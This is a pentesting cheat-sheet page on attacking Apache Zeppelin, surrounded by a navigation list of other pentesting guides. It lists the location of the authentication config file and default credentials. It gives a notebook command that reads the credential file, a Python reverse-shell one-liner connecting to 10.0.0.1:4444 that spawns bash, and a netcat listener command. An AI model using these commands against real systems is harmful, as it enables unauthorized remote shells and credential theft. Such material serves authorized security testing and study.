Apache Zeppelin Pentesting

Atlassian Confluence Pentesting

Bookmarklet Attack

Broken Link Hijacking

Browser in the Browser (BITB) Attack

CGI Pentesting

Cacti Pentesting

Captcha Bypass with OCR

ClipBucket Pentesting

Code Deobfuscation

Codiad Pentesting

Dompdf RCE

Dump Git Repository from Website

Extract Web Browser Passwords

GhostScript Pentesting

Go SSTI

Grafana Pentesting

HTML Smuggling

HashiCorp Consul Pentesting

Icinga Web Pentesting

JBOSS Pentesting

JWT (Json Web Token) Pentesting

Java RMI Pentesting

Jenkins Pentesting

LimeSurvey Pentesting

Log4j Pentesting

OpenCATS Pentesting

PHP RCE Cheat Sheet

PHP Srand Time Abusing

PHP hash_hmac Bypass

Restaurant Management System (RMS) Pentesting

TeamCity Pentesting

Tiny File Manager Pentesting

Web Browser Settings for Pentesting

Web PHP Pentesting

WebAnno Pentesting

WebDAV Pentesting

WebSocket Pentesting

Webmin Pentesting

Apache Zeppelin Pentesting

Last modified: 2023-04-02

Apache Zeppelin is a web-based notebook that enables data-driven. It uses 8080 port by default.

Authentication Config File

/shiro.ini

Default Credentials

admin:admin
admin:password1
user1:password2
user1:role1
user1:role2
user2:password3
user2:role3
user3:password4
user3:role2

RCE in Notebooks

We can execute remote OS command in notebooks. Access to the notebook and execute the following scripts.

%python

import os

# Configurations
os.system('cat conf/shiro.ini')

Reverse Shell

Before executing the following script, we need to start a listener such as nc -lvnp 4444 in local machine.

%python

import os,pty,socket;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")

References

https://zeppelin.apache.org/docs/0.8.0/setup/security/shiro_authentication.html

Method

Security Risk

Cookie

CMS

Framework

Template Engine

API

Cloud

Microsoft

Tool

Others

Apache Zeppelin Pentesting

Authentication Config File

Default Credentials

RCE in Notebooks

Reverse Shell

References

ON THIS PAGE